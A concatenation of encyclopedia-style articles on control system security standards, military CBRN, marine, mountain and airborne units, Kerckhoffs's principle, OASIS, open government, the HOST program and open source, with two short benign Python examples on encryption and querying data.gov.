systems.[4] MOSAICS addresses the Department of Defense (DOD) operational need for cyber defense capabilities to defend critical infrastructure control systems from cyber attack, such as power, water and wastewater, and safety controls, which affect the physical environment.[5] The MOSAICS JCTD prototype will be shared with commercial industry through Industry Days for further research and development, an approach intended to lead to innovative, game-changing capabilities for the cybersecurity of critical infrastructure control systems.[6] The international standard for the cybersecurity of automation and control systems is IEC 62443. In addition, multiple national organizations, such as NIST and NERC in the USA, have released guidelines and requirements for cybersecurity in control systems. The IEC 62443 cybersecurity standards define processes, techniques, and requirements for industrial automation and control systems (IACS). The IEC 62443 standards and technical reports are organized into general categories called General, Policies and Procedures, System, Component, Profiles, and Evaluation. The most widely recognized and latest NERC security standard is NERC 1300, which is a modification/update of NERC 1200.
The latest version of NERC 1300 is called CIP-002-3 through CIP-009-3, with CIP referring to Critical Infrastructure Protection. These standards are used to secure bulk electric systems, although NERC has created standards in other areas as well. The bulk electric system standards also provide network security administration while still supporting best-practice industry processes. Although it is not a standard, the NIST Cybersecurity Framework (NIST CSF) provides a high-level taxonomy of cybersecurity outcomes and a methodology to assess and manage those outcomes. It is intended to help private sector organizations that provide critical infrastructure with guidance on how to protect it.[7] NIST Special Publication 800-82 Rev. 2, "Guide to Industrial Control System (ICS) Security", describes how to secure multiple types of industrial control systems against cyber attacks while considering the performance, reliability, and safety requirements specific to ICS.[8] Certifications for control system security have been established by several global certification bodies. Most of the schemes are based on IEC 62443 and describe test methods, surveillance audit policy, public documentation policies, and other specific aspects of their program.
https://en.wikipedia.org/wiki/Control_system_security
Many countries around the world maintain military units that are specifically trained to cope with CBRN (chemical, biological, radiological, nuclear) threats. Besides these specialized units, most modern armed forces give all their personnel generalized basic CBRN self-defense training. Army Navy Nuclear Biological Chemical Defense Special Joint Battalion (Ειδικό Διακλαδικό Λόχο Πυρηνικής Βιολογικής Χημικής Άμυνας - Eidikó Diakladikó Lócho Pyrinikís Viologikís Chimikís Ámynas)[57] Army Air Force Integrated Defence Staff National Disaster Response Force Central Industrial Security Force Central Reserve Police Force Border Security Force Islamic Revolutionary Guard Corps Inter-services Army Navy Air Force Army Army Reserve Army National Guard Navy Marines Air Force Coast Guard [208] Joint Army National Guard and Air National Guard
https://en.wikipedia.org/wiki/List_of_CBRN_warfare_forces
Many countries around the world maintain marine and naval infantry military units. Even if only a few nations have the capability to launch major amphibious assault operations, most marine and naval infantry forces are able to carry out limited amphibious landings and riverine and coastal warfare tasks. The list also includes army units specifically trained to operate as marines or naval infantry forces, and navy units with specialized naval security and boarding tasks. The Marine Fusiliers Regiments are the marine infantry regiments of the Algerian Navy, and they are specialised in amphibious warfare.[1] The RFM have about 7000 soldiers in their ranks. Within the Algerian navy there are 8 regiments of marine fusiliers. Future marine fusiliers and marine commandos are trained in dedicated schools. Army Navy Army Navy The IDF's 35th Parachute Brigade "Flying Serpent" is a paratrooper brigade that also exercises sea landing capabilities. The Italian Army's Cavalry Brigade "Pozzuolo del Friuli" forms, together with the Italian Navy's 3rd Naval Division and San Marco Marine Brigade, the Italian military's National Sea Projection Capability (Forza di proiezione dal mare). Additionally, the 17th Anti-aircraft Artillery Regiment "Sforzesca" provides air-defense assets.
https://en.wikipedia.org/wiki/List_of_marines_and_similar_forces
Many countries around the world maintain military units that are specifically trained for ski and mountain warfare tasks. The list does not include non-mountain special forces units, even if several of them have some mountain warfare capabilities. Militia units (Miliz) are also maintained.[46]
https://en.wikipedia.org/wiki/List_of_mountain_warfare_forces
Many countries around the world maintain military units that are trained as paratroopers. These include special forces units that are parachute-trained, as well as conventional airborne forces units. Special Operations Regiment (Kenya) Army Air Force
https://en.wikipedia.org/wiki/List_of_paratrooper_forces
Kerckhoffs's principle (also called Kerckhoffs's desideratum, assumption, axiom, doctrine or law) of cryptography was stated by Dutch-born cryptographer Auguste Kerckhoffs in the 19th century. The principle holds that a cryptosystem should be secure even if everything about the system, except the key, is public knowledge. This concept is widely embraced by cryptographers, in contrast to security through obscurity, which is not. Kerckhoffs's principle was phrased by American mathematician Claude Shannon as "the enemy knows the system",[1] i.e., "one ought to design systems under the assumption that the enemy will immediately gain full familiarity with them". In that form, it is called Shannon's maxim. Another formulation by American researcher and professor Steven M. Bellovin is: In other words—design your system assuming that your opponents know it in detail. (A former official at NSA's National Computer Security Center told me that the standard assumption there was that serial number 1 of any new device was delivered to the Kremlin.)[2] The invention of telegraphy radically changed military communications and dramatically increased the number of messages that needed to be protected from the enemy, leading to the development of field ciphers that had to be easy to use without large confidential codebooks prone to capture on the battlefield.[3] It was this environment which led to the development of Kerckhoffs's requirements. Auguste Kerckhoffs was a professor of German language at the École des Hautes Études Commerciales (HEC) in Paris.[4] In early 1883, Kerckhoffs's article, La Cryptographie Militaire,[5] was published in two parts in the Journal of Military Science, in which he stated six design rules for military ciphers.[6] Translated from French, they are:[7][8] Some are no longer relevant given the ability of computers to perform complex encryption. The second rule, now known as Kerckhoffs's principle, is still critically important.[9] Kerckhoffs viewed cryptography as a rival to, and a better alternative than, steganographic encoding, which was common in the nineteenth century for hiding the meaning of military messages. One problem with encoding schemes is that they rely on humanly held secrets such as "dictionaries" which disclose, for example, the secret meaning of words. Steganographic-like dictionaries, once revealed, permanently compromise a corresponding encoding system. Another problem is that the risk of exposure increases as the number of users holding the secrets increases. Nineteenth-century cryptography, in contrast, used simple tables which provided for the transposition of alphanumeric characters, generally given by row-column intersections, which could be modified by keys that were generally short, numeric, and could be committed to human memory. The system was considered "indecipherable" because tables and keys do not convey meaning by themselves. Secret messages can be compromised only if a matching set of table, key, and message falls into enemy hands in a relevant time frame. Kerckhoffs viewed tactical messages as having only a few hours of relevance. Systems are not necessarily compromised, because their components (i.e. alphanumeric character tables and keys) can be easily changed. Using secure cryptography is supposed to replace the difficult problem of keeping messages secure with a much more manageable one: keeping relatively small keys secure. A system that requires long-term secrecy for something as large and complex as the whole design of a cryptographic system obviously cannot achieve that goal.
It only replaces one hard problem with another. However, if a system is secure even when the enemy knows everything except the key, then all that is needed is to manage keeping the keys secret.[10] There are a large number of ways the internal details of a widely used system could be discovered. The most obvious is that someone could bribe, blackmail, or otherwise threaten staff or customers into explaining the system. In war, for example, one side will probably capture some equipment and people from the other side. Each side will also use spies to gather information. If a method involves software, someone could do memory dumps or run the software under the control of a debugger in order to understand the method. If hardware is being used, someone could buy or steal some of the hardware and build whatever programs or gadgets are needed to test it. Hardware can also be dismantled so that the chip details can be examined under the microscope. A generalization some make from Kerckhoffs's principle is: "The fewer and simpler the secrets that one must keep to ensure system security, the easier it is to maintain system security." Bruce Schneier ties it in with a belief that all security systems must be designed to fail as gracefully as possible: Kerckhoffs's principle applies beyond codes and ciphers to security systems in general: every secret creates a potential failure point. Secrecy, in other words, is a prime cause of brittleness—and therefore something likely to make a system prone to catastrophic collapse. Conversely, openness provides ductility.[11] Any security system depends crucially on keeping some things secret. However, Kerckhoffs's principle points out that the things kept secret ought to be those least costly to change if inadvertently disclosed.[9] For example, a cryptographic algorithm may be implemented by hardware and software that is widely distributed among users. If security depends on keeping that secret, then disclosure leads to major logistic difficulties in developing, testing, and distributing implementations of a new algorithm – it is "brittle". On the other hand, if keeping the algorithm secret is not important, but only the keys used with the algorithm must be secret, then disclosure of the keys simply requires the simpler, less costly process of generating and distributing new keys.[12] In accordance with Kerckhoffs's principle, the majority of civilian cryptography makes use of publicly known algorithms. By contrast, ciphers used to protect classified government or military information are often kept secret (see Type 1 encryption). However, it should not be assumed that government/military ciphers must be kept secret to maintain security. It is possible that they are intended to be as cryptographically sound as public algorithms, and the decision to keep them secret is in keeping with a layered security posture. It is moderately common for companies, and sometimes even standards bodies as in the case of the CSS encryption on DVDs, to keep the inner workings of a system secret. Some[who?] argue this "security by obscurity" makes the product safer and less vulnerable to attack. A counter-argument is that keeping the innards secret may improve security in the short term, but in the long run, only systems that have been published and analyzed should be trusted.
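The key-versus-algorithm distinction is easy to see in modern practice. Below is a minimal sketch of Kerckhoffs's principle at work, assuming the third-party Python "cryptography" package (the message text and variable names are illustrative only):

import base64  # only used to show the key is just printable bytes
from cryptography.fernet import Fernet

# Fernet's construction (AES-128-CBC plus HMAC-SHA256) is publicly
# specified; nothing about the mechanism itself is secret.
key = Fernet.generate_key()  # the only secret in the whole scheme

cipher = Fernet(key)
token = cipher.encrypt(b"attack at dawn")

# An adversary may read this code and the Fernet specification, yet
# without the key the token is computationally useless. If the key
# leaks, security is restored by the cheap step of generating and
# distributing a new key, not by redesigning the cipher.
print(cipher.decrypt(token))  # b'attack at dawn'

The design choice mirrors the passage above: the expensive-to-change part (the algorithm) is public and widely analyzed, while the cheap-to-change part (the key) carries all the secrecy.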
Steven Bellovin and Randy Bush commented:[13]
Security Through Obscurity Considered Dangerous. Hiding security vulnerabilities in algorithms, software, and/or hardware decreases the likelihood they will be repaired and increases the likelihood that they can and will be exploited. Discouraging or outlawing discussion of weaknesses and vulnerabilities is extremely dangerous and deleterious to the security of computer systems, the network, and its citizens.
Open Discussion Encourages Better Security. The long history of cryptography and cryptanalysis has shown time and time again that open discussion and analysis of algorithms exposes weaknesses not thought of by the original authors, and thereby leads to better and more secure algorithms. As Kerckhoffs noted about cipher systems in 1883 [Kerc83], "Il faut qu'il n'exige pas le secret, et qu'il puisse sans inconvénient tomber entre les mains de l'ennemi." (Roughly, "the system must not require secrecy and must be able to be stolen by the enemy without causing trouble.")
https://en.wikipedia.org/wiki/Kerckhoffs%27s_Principle
The Organization for the Advancement of Structured Information Standards (OASIS; /oʊˈeɪ.sɪs/) is a nonprofit consortium that works on the development, convergence, and adoption of projects - both open standards and open source - for computer security, blockchain, Internet of things (IoT), emergency management, cloud computing, legal data exchange, energy, content technologies, and other areas.[2] OASIS was founded under the name "SGML Open" in 1993. It began as a trade association of Standard Generalized Markup Language (SGML) tool vendors that cooperatively promoted the adoption of SGML, mainly through educational activities, though some technical activity was also pursued, including an update of the CALS Table Model specification and specifications for fragment interchange and entity management.[3] In 1998, with the movement of the industry to XML, SGML Open changed its emphasis from SGML to XML, and changed its name to OASIS Open to be inclusive of XML and reflect an expanded scope of technical work and standards. The focus of the consortium's activities also moved from promoting adoption (as XML was getting much attention on its own) to developing technical specifications. In July 2000 a new technical committee process was approved. With the adoption of the process, the manner in which technical committees were created, operated, and progressed their work was regularized. At the adoption of the process there were five technical committees; by 2004 there were nearly 70.[citation needed] During 1999, OASIS was approached by UN/CEFACT, the committee of the United Nations dealing with standards for business, to jointly develop a new set of specifications for electronic business. The joint initiative, called "ebXML", which first met in November 1999, was chartered for a three-year period. At the final meeting under the original charter, in Vienna, UN/CEFACT and OASIS agreed to divide the remaining work between the two organizations and to coordinate its completion through a coordinating committee. In 2004 OASIS submitted its completed ebXML specifications to ISO TC154, where they were approved as ISO 15000. The consortium has its headquarters in Woburn, Massachusetts, shared with other companies. In December 2020, OASIS moved to its current location, 400 TradeCenter Drive. Previous office locations include 25 Corporate Drive, Suite 103 and 35 Corporate Drive, Suite 150, both in Burlington, MA.[4] The following standards are under development or maintained by OASIS technical committees: Adhesion to the consortium requires fees to be paid, which must be renewed annually, depending on the membership category adherents want to access.[6] Among the adherents are members from Dell, IBM, ISO/IEC, Cisco Systems, KDE e.V., Microsoft, Oracle, Red Hat, The Document Foundation, universities, government agencies, individuals and employees from other less-known companies.[7][8] Member sections are special interest groups within the consortium that focus on specific topics. These sections keep their own distinguishable identity and have full autonomy to define their work program and agenda.[9] The integration of the member sections in the standardization process is organized via the technical committees. Active member sections are for example: Member sections may be completed when they have achieved their objectives. The standards that they promoted are then maintained by the relevant technical committees directly within OASIS.
For example: Like many bodies producing open standards, e.g. ECMA,[10] OASIS added a reasonable and non-discriminatory licensing (RAND) clause to its policy in February 2005.[8] That amendment required participants to disclose intent to apply for software patents for technologies under consideration in the standard. Contrary to the W3C, which requires participants to offer royalty-free licenses to anyone using the resulting standard, OASIS offers a similar Royalty Free on Limited Terms mode, along with a Royalty Free on RAND Terms mode and a RAND (reasonable and non-discriminatory) mode for its committees. Compared to the W3C, OASIS is less restrictive regarding the obligation of companies to grant a royalty-free license to the patents they own.[11] Controversy rapidly arose[12] because this licensing was added silently and allows publication of standards which could require licensing fee payments to patent holders. This situation could effectively eliminate the possibility of free/open source implementations of these standards. Further, contributors could initially offer royalty-free use of their patent, later imposing per-unit fees after the standard has been accepted. On April 11, 2005, The New York Times reported that IBM committed, for free, all of its patents to the OASIS group.[13] Larry Rosen, a software law expert and the leader of the reaction that rose up when OASIS quietly included a RAND clause in its policy, welcomed the initiative and supposed OASIS would not continue using that policy as other companies involved would follow. The RAND policy has still not been removed, and other commercial companies have not published such a free statement towards OASIS.[citation needed] Patrick Gannon, president and CEO of OASIS from 2001 to 2008,[14] minimized the risk that a company could take advantage of a standard to request royalties once it has been established, saying "If it's an option nobody uses, then what's the harm?"[citation needed] Sam Hiser, former marketing lead of the now defunct OpenOffice.org, explained that such patents towards an open standard are counterproductive and inappropriate. He also argued that IBM and Microsoft were shifting their standardization efforts from the W3C to OASIS, probably in a way to leverage their patent portfolios in the future. Hiser also attributed this RAND change in the OASIS policy to Microsoft.[15] The RAND term could indeed allow any company involved to leverage its patents in the future, but that amendment was probably added in a way to attract more companies to the consortium and encourage contributions from potential participants.[opinion] Big actors like Microsoft could indeed have applied pressure and made it a sine qua non condition for joining the consortium, possibly jeopardizing or boycotting the standard if such a clause was not present. Doug Mahugh — while working for Microsoft (a promoter of Office Open XML, a Microsoft document format competing with OASIS's ISO/IEC 26300, i.e. ODF v1.0) — claimed that "many countries have expressed frustration about the pace of OASIS's responses to defect reports that have been submitted on ISO/IEC 26300 and the inability for SC 34 members to participate in the maintenance of ODF."[16] However, Rob Weir, co-chair of the OASIS ODF Technical Committee, noted that at the time, "the ODF TC had received zero defect reports from any ISO/IEC national body other than Japan".
He added that the submitter of the original Japanese defect report, Murata Makoto, was satisfied with the preparation of the errata.[17] He also self-published a blog post accusing Microsoft of enlisting people to modify the ODF and OpenXML Wikipedia articles in its favor.[18]
https://en.wikipedia.org/wiki/OASIS_(organization)
Open government is the governing doctrine which maintains that citizens have the right to access the documents and proceedings of the government to allow for effective public oversight.[1] In its broadest construction, it opposes reason of state and other considerations which have tended to legitimize extensive state secrecy. The origins of open-government arguments can be dated to the time of the European Age of Enlightenment, when philosophers debated the proper construction of a then nascent democratic society. It is also increasingly being associated with the concept of democratic reform.[2] The United Nations Sustainable Development Goal 16, for example, advocates for public access to information as a criterion for ensuring accountable and inclusive institutions.[3] The concept of open government is broad in scope but is most often connected to ideas of government transparency, participation and accountability. Transparency is defined as the visibility and inferability of information,[4] accountability as answerability and enforceability,[5] and participation is often graded along the "ladder of citizen participation".[6] Harlan Yu and David G. Robinson specify the distinction between open data and open government in their paper "The New Ambiguity of 'Open Government'". They define open government in terms of service delivery and public accountability. They argue that technology can be used to facilitate disclosure of information, but that the use of open data technologies does not necessarily equate to accountability.[7] The Organisation for Economic Co-operation and Development (OECD) approaches open government through the following categories: whole-of-government coordination, civic engagement and access to information, budget transparency, integrity and the fight against corruption, use of technology, and local development.[8] The term 'open government' originated in the United States after World War II. Wallace Parks, who served on a subcommittee on Government Information created by the U.S. Congress, introduced the term in his 1957 article "The Open Government Principle: Applying the Right to Know under the Constitution". After this, and after the passing of the Freedom of Information Act (FOIA) in 1966, federal courts began using the term as a synonym for government transparency.[7] Although this was the first time that 'open government' was introduced as a term, the concepts of transparency and accountability in government can be traced back to Ancient Greece, in fifth-century B.C.E. Athens, where different legal institutions regulated the behavior of officials and offered a path for citizens to express their grievances towards them. One such institution, the euthyna, held officials to a standard of "straightness" and required that they give an account, in front of an assembly of citizens, of everything that they did that year.[9] In more recent history, the idea that government should be open to public scrutiny and susceptible to public opinion dates back to the time of the Enlightenment, when many philosophes made an attack on absolutist doctrines of state secrecy.[10][11] The passage of formal legislation can also be traced to this time, with Sweden (which then included Finland as a Swedish-governed territory) enacting free press legislation as part of its constitution (Freedom of the Press Act, 1766).[12] Influenced by Enlightenment thought, the revolutions in the United States (1776) and France (1789) enshrined provisions and requirements for public budgetary accounting and freedom of the press in constitutional articles.
In the nineteenth century, attempts by Metternichean statesmen to row back on these measures were vigorously opposed by a number of eminent liberal politicians and writers, including Jeremy Bentham, John Stuart Mill and John Dalberg-Acton, 1st Baron Acton. Open government is widely seen to be a key hallmark of contemporary democratic practice and is often linked to the passing of freedom of information legislation. Scandinavian countries claim to have adopted the first freedom of information legislation,[citation needed] dating the origins of its modern provisions to the eighteenth century,[citation needed] with Finland continuing the presumption of openness after gaining independence in 1917 and passing its Act on Publicity of Official Documents in 1951 (superseded by new legislation in 1999). An emergent development also involves the increasing integration of software and mechanisms that allow citizens to become more directly involved in governance, particularly in the area of legislation.[13] Some refer to this phenomenon as e-participation, which has been described as "the use of information and communication technologies to broaden and deepen political participation by enabling citizens to connect with one another and with their elected representatives".[14] Morocco's new constitution of 2011 outlined several goals the government wishes to achieve in order to guarantee citizens' right to information.[15] The world has been offering support to the government to enact these reforms through the Transparency and Accountability Development Policy Loan (DPL). This loan is part of a larger joint program between the European Union and the African Development Bank to offer financial and technical support to governments attempting to implement reforms.[16] As of 2010, section 35 of Kenya's constitution ensures citizens' right to government information. The article states "35.(1) Every citizen has the right of access to — (a) information held by the State; and (b) information held by another person and required for the exercise or protection of any right or fundamental freedom ... (3) The State shall publish and publicize any important information affecting the nation." Important government data is now freely available through the Kenya Open Data Initiative.[17] Taiwan started its e-government program in 1998 and since then has had a series of laws and executive orders to enforce open government policies. The Freedom of Government Information Law of 2005 stated that all government information must be made public. Such information includes budgets, administrative plans, communications of government agencies, and subsidies. Since then it has released its open data platform, data.gov.tw. The Sunflower Movement of 2014 emphasized the value that Taiwanese citizens place on openness and transparency.
A white paper published by the National Development Council with policy goals for 2020 explores ways to increase citizen participation and use open data for further government transparency.[18] The Philippines passed the Freedom of Information Order in 2016, outlining guidelines to practice government transparency and full public disclosure.[19] In accordance with its General Appropriations Act of 2012, the Philippine government requires government agencies to display a "transparency seal" on their websites, which contains information about the agency's functions, annual reports, officials, budgets, and projects.[20] The Right to Information (RTI) movement in India created the RTI law in 2005, after environmental movements demanded the release of information regarding environmental deterioration due to industrialization.[21] Another catalyst for the RTI law and other similar laws in southeast Asia may have been multilateral agencies offering aid and loans in exchange for more transparency or "democratic" policies.[22][23] In October 2023, the Iranian government publicly opposed a transparency program covering the three branches (judiciary, executive, legislative). The transparency law never passed, as after nine months the judiciary and state did not consent.[24][25] The government maintains the Iranfoia website for requests.[26] In the Netherlands, large social unrest and the growing influence of television in the 1960s led to a push for more government openness. Access to information legislation was passed in 1980; since then, further emphasis has been placed on measuring the performance of government agencies.[27] Transparency as a legal principle underpins European Union law, for example in regard to the quality of the drafting of legislation,[28] and as a principle to be exercised within government procurement procedures. European law academics argued in 2007 that a "new legal principle" of transparency might be emerging "in gestation" within EU law.[29] The government of the Netherlands adopted an Open Government in Action (Open overheid in actie) plan for 2016–2017, which outlines nine concrete commitments to the open government standards set by the OECD.[30] Since 2018, in Wales, the Welsh Government has funded the training of Wikipedia skills in secondary schools as part of the Welsh Baccalaureate, and uses an open licence on all published videos and other content. In 2009, President Obama released a memorandum on transparency and open government and started the Open Government Initiative. In his memorandum he put forward his administration's goal to strengthen democracy through a transparent, participatory and collaborative government.[31] The initiative has the goals of a transparent and collaborative government, ending secrecy in Washington while improving effectiveness through increased communication between citizens and government officials.[32] Movements for government transparency in recent United States history started in the 1950s, after World War II, because federal departments and agencies had started limiting information availability as a reaction to global hostilities during the war and due to fear of Cold War spies. Agencies were given the right to deny access to information "for good cause found" or "in the public interest".
These policies made it difficult for congressional committees to get access to records and documents, which then led to explorations of possible legislative solutions.[33] Since the early 2000s, transparency has been an important part of Latin America's efforts to professionalize government and fight corruption. All countries in the region have enacted freedom of information laws, beginning with Mexico, Peru, and Panama in 2002.[34][35] These efforts include Chile's Anti-Corruption and Probity Agenda and State Modernization Agenda; in 2008, Chile passed the Transparency Law, which has led to further open government reforms.[36] Chile published its open government action plan for 2016–18 as part of its membership of the Open Government Partnership (OGP).[37] Transparency has been described as the visibility and inferability of information, defined by complete and findable information which leads to accurate conclusions.[4] It has two principal manifestations: monitoring transparency and consultation or collaboration transparency. It holds importance in more modern discussions because of its presence in new public management.[38] For transparency to work, the idea goes beyond government involvement and must include public trust. Transparency in government has three main aspects. First, budgetary information must be viewable by the public. Second, there must be an effective way to make and enforce laws.[38] Last, non-government organizations and a form of independent media must be at the center for public use.[38] With transparency, there are also factors for data disclosure, such as timeliness, quality, and access and visibility.[39] Data disclosure is important for transparency because it increases public understanding of governmental practices and is the goal of open government. However, there are arguments on both sides of transparency that must be considered. Transparency in government is often credited with generating government accountability, which supporters argue leads to a reduction in government corruption, bribery and other malfeasance.[40] This is discussed later as accountability with transparency. Some commentators contend that an open, transparent government allows for the dissemination of information, which in turn helps produce greater knowledge and societal progress.[40] Organizations supporting transparency policies, such as the OECD and the Open Government Partnership, claim that open government reforms can also lead to increased trust in government,[41][42] although there is mixed evidence to support these claims, with increased transparency sometimes leading to reduced trust in government.[43][44][45][46][47] Public opinion can also be shifted when people have access to see the results of a certain policy. The United States government has at times forbidden journalists to publish photographs of soldiers' coffins,[48] an apparent attempt to manage emotional reactions that might heighten public criticism of ongoing wars; nonetheless, many believe that emotionally charged images can be valuable information.
Similarly, some opponents of the death penalty have argued that executions should be televised so the public can "see what is being done in their name and with their tax dollars."[49] Government transparency is beneficial for efficient democracy, as information helps citizens form meaningful conclusions about upcoming legislation and vote on it in the next election.[50] According to the Carnegie Endowment for International Peace, greater citizen participation in government is linked to government transparency.[51] Advocates of open government often argue that civil society, rather than government legislation, offers the best route to more transparent administration. They point to the role of whistleblowers reporting from inside the government bureaucracy (individuals like Daniel Ellsberg or Paul van Buitenen). They argue that an independent and inquiring press, printed or electronic, is often a stronger guarantor of transparency than legislative checks and balances.[52][53] The contemporary doctrine of open government finds its strongest advocates in non-governmental organizations keen to counter what they see as the inherent tendency of government to lapse, whenever possible, into secrecy. Prominent among these NGOs are bodies like Transparency International or the Open Society Institute. They argue that standards of openness are vital to the ongoing prosperity and development of democratic societies. Government indecision, poor performance and gridlock are among the risks of government transparency, according to some critics.[54] Political commentator David Frum wrote in 2014 that, "instead of yielding more accountability, however, these reforms [transparency reforms] have yielded more lobbying, more expense, more delay, and more indecision."[55] Jason Grumet argues that government officials cannot properly deliberate, collaborate and compromise when everything they are doing is being watched.[56] A randomized controlled trial conducted with 463 delegates of the National Assembly of Vietnam showed that increased transparency of the legislative proceedings, such as debates and query transcripts, curtailed delegates' activity in the query sessions, as they avoided taking part in activities that could embarrass leaders of the Vietnamese regime.[57] Privacy is another concern. Citizens may incur "adverse consequences, retribution or negative repercussions"[1] from information provided by governments. Teresa Scassa, a law professor at the University of Ottawa, outlined three main possible privacy challenges in a 2014 article. First is the difficulty of balancing further transparency of government while also protecting the privacy of personal information, or information about identifiable individuals that is in the hands of the government. Second is dealing with distinctions between data protection regulations for private and public sector actors, because governments may access information collected by private companies which are not controlled by laws as stringent. Third is the release of "big data", which may appear anonymized but can be reconnected to specific individuals using sophisticated algorithms.[58] Intelligence gathering, especially to identify violent threats (whether domestic or foreign), must often be done clandestinely. Frum wrote in 2014 that "the very same imperatives that drive states to collect information also require them to deny doing so.
These denials matter even when they are not believed."[59] Moral certitude undergirds much transparency advocacy, but a number of scholars question whether it is possible for us to have that certitude. They have also highlighted how transparency can support certain neoliberal imperatives.[60] Concerns have also been raised in the election administration community about the use of excessive Freedom of Information Act requests as a tactic of election deniers to disrupt the functioning of local and county election offices. Often unreasonably broad, repetitive, or based on misinformation, the high volume of requests has led to what a Colorado official said amounts to "a denial-of-service attack on local government." Local election officials in Florida and Michigan have reported spending 25-70% of staff time in recent years on processing public records requests.[61] A review of recent state laws by the Center for Election Innovation & Research found at least 13 states that have sought to protect election staff from the abuse of FOIA requests in several ways, such as creating publicly accessible databases that do not require staff assistance and giving election staff the authority to deny unreasonable or clearly frivolous requests.[61] Accountability focuses on promoting transparency and allowing the public to understand the actions of their government.[62] Public officials are expected to share details about how public resources are used and what their objectives are.[39] Accountability in open government reduces corruption and increases transparency. However, it is important to note that there is transparency both with and without accountability in open government. Transparency without accountability is often more difficult to monitor, and less responsibility is required from the government. Transparency with accountability has proven to be more effective, as a trustworthy relationship can be built between government agencies and the people governed by them.[62] The argument for transparency with or without accountability was mentioned previously and highlights major issues such as losing governmental trust or privacy issues with accountability. Some governments have created portals in order to allow people to see critical data and improve accountability and transparency.[39] Not all data released on these portals is relevant and easily accessible, meaning transparency is not always easily attainable. Given the criteria for valuable information, governments should look for quality, completeness, timeliness, and usability when releasing important information that shows transparency and supports accountability.[39] Accountability in open government establishes the presence of transparency within governments.[38] Accountability and transparency work to promote open government in democracies. Through organizations such as the Open Government Partnership (OGP) within the United States, which was established by the U.S. Department of State, there have been efforts to enhance democracies through both accountability and transparency.[62] These efforts reach beyond the scope of North America and even into some Latin American and Asian countries.
Promoting open government in Latin American countries has increased public trust and reduced corruption.[63] Latin American countries were among those included in the OGP plan promoted by the United States under the Obama administration.[63] Additionally, in Asia, there has been a push towards right to information (RTI) to help build accountability.[64] However, these measures have shown that open government policies are not one size fits all. They can fail and have to be tweaked for each region, and there must be awareness from the public to demand accountability to ensure they receive it from the government.[64] Most of the relationship helps strengthen transparency in governments through the means of accountability.[38] Transparency acts as the vision for open government, allowing the public to have quality access to government records and data.[65] This open access forces governments to be more accountable, as they cannot hide corruption under transparency. There can be transparency without accountability, which allows the government to choose which data is of significant enough value to be released to the public.[66] This does not solve the lack of accountability and highlights the necessity of transparency with accountability. With both transparency and accountability, there must be regulations in place to make agencies justify why they are relinquishing certain information, along with strict enforcement to ensure all transparency measures are fulfilled.[67] Governments and organizations are using new technologies as a tool for increased transparency. Examples include the use of open data platforms to publish information online and the theory of open source governance. Open government data (OGD), a term which refers specifically to the public publishing of government datasets,[68] is often made available through online platforms such as data.gov.uk or www.data.gov. Proponents of OGD argue that easily accessible data pertaining to governmental institutions allows for further citizen engagement within political institutions.[69] OGD principles require that data is complete, primary, timely, accessible, machine processable, non-discriminatory, non-proprietary, and license free.[70] Public and private sector platforms provide an avenue for citizens to engage while offering access to transparent information that citizens have come to expect. Numerous organizations have worked to consolidate resources for citizens to access government (local, state and federal) budget spending, stimulus spending, lobbyist spending, legislative tracking, and more.[71]
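To illustrate how such open data platforms expose datasets programmatically, here is a minimal sketch against the public CKAN Action API that powers catalog.data.gov; it assumes the third-party Python "requests" package, and the search keyword "budget" is an illustrative choice, not drawn from the cited sources:

import requests

# Search the data.gov catalog (a CKAN instance) for datasets matching
# a keyword; the endpoint and response shape follow the public CKAN
# Action API documentation.
resp = requests.get(
    "https://catalog.data.gov/api/3/action/package_search",
    params={"q": "budget", "rows": 3},
    timeout=30,
)
resp.raise_for_status()

for dataset in resp.json()["result"]["results"]:
    # Each record names its publishing organization and title; the
    # organization field can be absent, so read it defensively.
    org = (dataset.get("organization") or {}).get("title", "unknown")
    print(org, "-", dataset["title"])

Because the catalog is machine processable and license free in the OGD sense, a citizen, journalist, or watchdog group can query it directly without requesting staff assistance from the publishing agency.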
https://en.wikipedia.org/wiki/Open_government
Homeland Open Security Technology (HOST) is a five-year, $10 million program by the Department of Homeland Security's Science and Technology Directorate to promote the creation and use of open security and open-source software in the United States government and military, especially in areas pertaining to computer security.[1][2][3][4] Proponent David A. Wheeler claims that open-source security could also extend to hardware and written documents.[5][6] In October 2011, the project won the Open Source for America 2011 Government Deployment Open Source Award.[7] The project is contracted to the Open Technology Research Consortium, which consists of the Georgia Tech Research Institute (primary), the Center for Agile Technology at the University of Texas at Austin, the Open Source Software Institute, and the Open Information Security Foundation.[8][9][10] The project has contributed funding towards the OpenSSL Software Foundation and the Open Information Security Foundation.[11][12] In October 2012, HOST hosted the Open Cybersecurity Summit in Washington, D.C.; it was a one-day summit with a keynote by Stewart A. Baker, former Assistant Secretary for Policy of the Department of Homeland Security.[13][14][15]
https://en.wikipedia.org/wiki/Homeland_Open_Security_Technology
Open source is source code that is made freely available for possible modification and redistribution. Products include permission to use and view the source code,[1] design documents,[2] or content of the product. The open source model is a decentralized software development model that encourages open collaboration.[3][4] A main principle of open source software development is peer production, with products such as source code, blueprints, and documentation freely available to the public. The open source movement in software began as a response to the limitations of proprietary code. The model is used for projects such as open source appropriate technology[5] and open source drug discovery.[6][7] Open source promotes universal access via an open-source or free license to a product's design or blueprint, and universal redistribution of that design or blueprint.[8][9] Before the phrase open source became widely adopted, developers and producers used a variety of other terms, such as free software, shareware, and public domain software. Open source gained hold with the rise of the Internet.[10] The open-source software movement arose to clarify copyright, licensing, domain, and consumer issues. Generally, open source refers to a computer program in which the source code is available to the general public for usage, modification from its original design, and publication of their version (fork) back to the community. Many large formal institutions have sprung up to support the development of the open-source movement, including the Apache Software Foundation, which supports community projects such as the open-source framework and the open-source HTTP server Apache HTTP. The sharing of technical information predates the Internet and the personal computer considerably. For instance, in the early years of automobile development a group of capital monopolists owned the rights to a 2-cycle gasoline-engine patent originally filed by George B. Selden.[11] By controlling this patent, they were able to monopolize the industry and force car manufacturers to adhere to their demands, or risk a lawsuit. In 1911, independent automaker Henry Ford won a challenge to the Selden patent. The result was that the Selden patent became virtually worthless and a new association (which would eventually become the Motor Vehicle Manufacturers Association) was formed.[11] The new association instituted a cross-licensing agreement among all US automotive manufacturers: although each company would develop technology and file patents, these patents were shared openly and without the exchange of money among all the manufacturers.[11] By the time the US entered World War II, 92 Ford patents and 515 patents from other companies were being shared among these manufacturers, without any exchange of money (or lawsuits).[11] Early instances of the free sharing of source code include IBM's source releases of its operating systems and other programs in the 1950s and 1960s, and the SHARE user group that formed to facilitate the exchange of software.[12][13] Beginning in the 1960s, ARPANET researchers used an open "Request for Comments" (RFC) process to encourage feedback on early telecommunication network 